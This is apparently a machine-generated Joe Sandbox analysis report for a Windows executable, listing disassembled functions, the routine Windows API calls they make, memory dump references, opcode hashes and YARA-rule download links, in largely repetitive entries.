                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 74b954b9480d32e3ae32a4e2d314c9bd3eda1f446e26fb1481bd484e3eed68ee
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 74b954b9480d32e3ae32a4e2d314c9bd3eda1f446e26fb1481bd484e3eed68ee
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: d19974a8d1c359e1f2802d20bc8e5baf3e0ff41f7fd802058d9d3d56d2d47437
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: d19974a8d1c359e1f2802d20bc8e5baf3e0ff41f7fd802058d9d3d56d2d47437
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 6aec787217c4f83b00eb7bfdbaa2949db78949ed0002d2ed827cdcb807fa2733
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 6aec787217c4f83b00eb7bfdbaa2949db78949ed0002d2ed827cdcb807fa2733
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 87ad042eed76bff47b91e26ea67042eb76ee97f9f97e69d0b78882ded0b6f561
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 87ad042eed76bff47b91e26ea67042eb76ee97f9f97e69d0b78882ded0b6f561
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: d9b9dd08ba32aaa1bac5e9338c75c6d9c837649bbd80bca1997a38cf13d47b99
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: d9b9dd08ba32aaa1bac5e9338c75c6d9c837649bbd80bca1997a38cf13d47b99
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    • Opcode ID: 407d5b45297d13a4bf8f2a2e0f3a808fd3960a1622d17995a2ed722ae911ce95
                                                                                    • Instruction ID: 673788784031477a865c1c81b17a015ff38145b412ed599fbaac47098e89f92b
                                                                                    • Opcode Fuzzy Hash: 407d5b45297d13a4bf8f2a2e0f3a808fd3960a1622d17995a2ed722ae911ce95
                                                                                    • Instruction Fuzzy Hash: B4A011C2AA8200FC300822A02E0ACBB020CC0C0B2AB30A22EF800800C2A8880A280830
                                                                                    Function 0073E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: abf3e51ddf96b9058c26c948dca5341cb1e12e0ed33523a902393f42e4635c21
                                                                                    • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                    • Opcode Fuzzy Hash: abf3e51ddf96b9058c26c948dca5341cb1e12e0ed33523a902393f42e4635c21
                                                                                    • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                    Function 0073E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: 308c43f38c0d4f1e5253cae27ca6764f377ae88c979edcf59885b1af5e75735f
                                                                                    • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                    • Opcode Fuzzy Hash: 308c43f38c0d4f1e5253cae27ca6764f377ae88c979edcf59885b1af5e75735f
                                                                                    • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                    Function 0073E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: 736ae9911c06b90f78c4bb291b7428f7fed3659cb45f2cf43e693535a0f93242
                                                                                    • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                    • Opcode Fuzzy Hash: 736ae9911c06b90f78c4bb291b7428f7fed3659cb45f2cf43e693535a0f93242
                                                                                    • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                    Function 0073E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: c2be0905137ce24624bfa9efb04f20bd29716ec93ccef637b50de2e57d81ba81
                                                                                    • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                    • Opcode Fuzzy Hash: c2be0905137ce24624bfa9efb04f20bd29716ec93ccef637b50de2e57d81ba81
                                                                                    • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                    Function 0073E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    • Opcode ID: bc85d44ed585accb71ed9e5fc95ff3c1f80a379094c16e36aa2017505e50b318
                                                                                    • Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
                                                                                    • Opcode Fuzzy Hash: bc85d44ed585accb71ed9e5fc95ff3c1f80a379094c16e36aa2017505e50b318
                                                                                    • Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
                                                                                    Function 0073E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    • Opcode ID: b9ace9524d0d7482d18ed9a9e7149c0db7a019f26bb6a0322e59bac91d6f9b89
                                                                                    • Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
                                                                                    • Opcode Fuzzy Hash: b9ace9524d0d7482d18ed9a9e7149c0db7a019f26bb6a0322e59bac91d6f9b89
                                                                                    • Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
                                                                                    Function 0074BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0074B7BB: GetOEMCP.KERNEL32(00000000,?,?,0074BA44,?), ref: 0074B7E6
                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0074BA89,?,00000000), ref: 0074BC64
                                                                                    • GetCPInfo.KERNEL32(00000000,0074BA89,?,?,?,0074BA89,?,00000000), ref: 0074BC77
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CodeInfoPageValid
                                                                                    • String ID:
                                                                                    • API String ID: 546120528-0
                                                                                    • Opcode ID: ecab868255bb0af639ec4e949942e9c6b4c117b148877fe0e001afcc079d839f
                                                                                    • Instruction ID: b103f32d4360cbaba7d80a98e49fc41b5285a7f55890ebd7174dfc033e8e5156
                                                                                    • Opcode Fuzzy Hash: ecab868255bb0af639ec4e949942e9c6b4c117b148877fe0e001afcc079d839f
                                                                                    • Instruction Fuzzy Hash: 7A512370E002459EDB248F75C8C56BABBF4EF41300F1844AED4968B262D73DEE458F90
                                                                                    Function 00729A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00729A50,?,?,00000000,?,?,00728CBC,?), ref: 00729BAB
                                                                                    • GetLastError.KERNEL32(?,00000000,00728411,-00009570,00000000,000007F3), ref: 00729BB6
                                                                                    Memory Dump Source
